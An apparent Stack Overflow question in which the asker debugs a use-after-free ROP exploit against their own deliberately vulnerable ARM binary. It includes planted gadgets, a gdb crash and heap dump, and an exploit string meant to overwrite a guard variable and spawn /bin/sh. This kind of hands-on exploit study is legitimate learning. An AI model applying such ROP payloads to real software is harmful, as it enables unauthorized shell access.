My program is crashing at 0x16 even with my ROP chain

Question

My program is crashing at 0x16 even with my ROP chain

So I recently started working on my binary which is vulnerable to Use-After-Free. I found it too easy to just jump to secret(). So I added a variable to the _DATA section and set its value to 0. and then I added a hard coded check in secret:

if(check == 0){

exit(0);

}

system("/bin/sh");

...

I also added a few "setup gadgets" to my code.
This is my "write gadget"

__asm__("str r0,[r1]");

and this is my setup gadget for the write gadget:

__asm__("pop {r0,r1,pc}");

Heap with my data on it:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000016
0x00000014 in ?? ()
(gdb) x/64wx 0x12edf0
0x12edf0: 0x41414141 0x42424242 0x43434343 0x44444444
0x12ee00: 0x45454545 0x46464646 0x47474747 0x48484848
0x12ee10: 0x0000bb8c 0xc0503149 0xbb800000 0xb96c0000
0x12ee20: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee30: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee40: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee50: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee60: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee70: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee80: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee90: 0x00000000 0x00000000 0x00000000 0x00000000
0x12eea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x12eeb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x12eec0: 0x60000000 0x60000000 0x00000004 0x00000000
0x12eed0: 0x00000000 0x00000000 0x00000000 0x00000000
0x12eee0: 0x00000000 0x00000000 0x00000000 0x00000000

and here is my exploit string: AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH\x8c\xbb\x00\x001111\x50\xc0\x00\x00\x80\xbb\x00\x00\x6c\xb9\x00\x00

Secret:

0x0000b96c <secret+0>:  80 40 2d e9                   push  {r7, lr}

gadget:

0x0000bb8c <gadget+0>:  03 80 bd e8                   pop   {r0, r1, pc}

the 0x00c050 is where is my variable is at

writeGagdet:

0x0000bb80 <writeGadget+4>:  00 00 81 e5                   str  r0, [r1]

does anybody know why its crashing at 0x16, and how to fix it? Thanks

c

arm

exploit

asked on Stack Overflow Mar 11, 2019 by

Tomi Tokics • edited Mar 13, 2019 by

Tomi Tokics

0 Answers

Nobody has answered this question yet.

User contributions licensed under CC BY-SA 3.0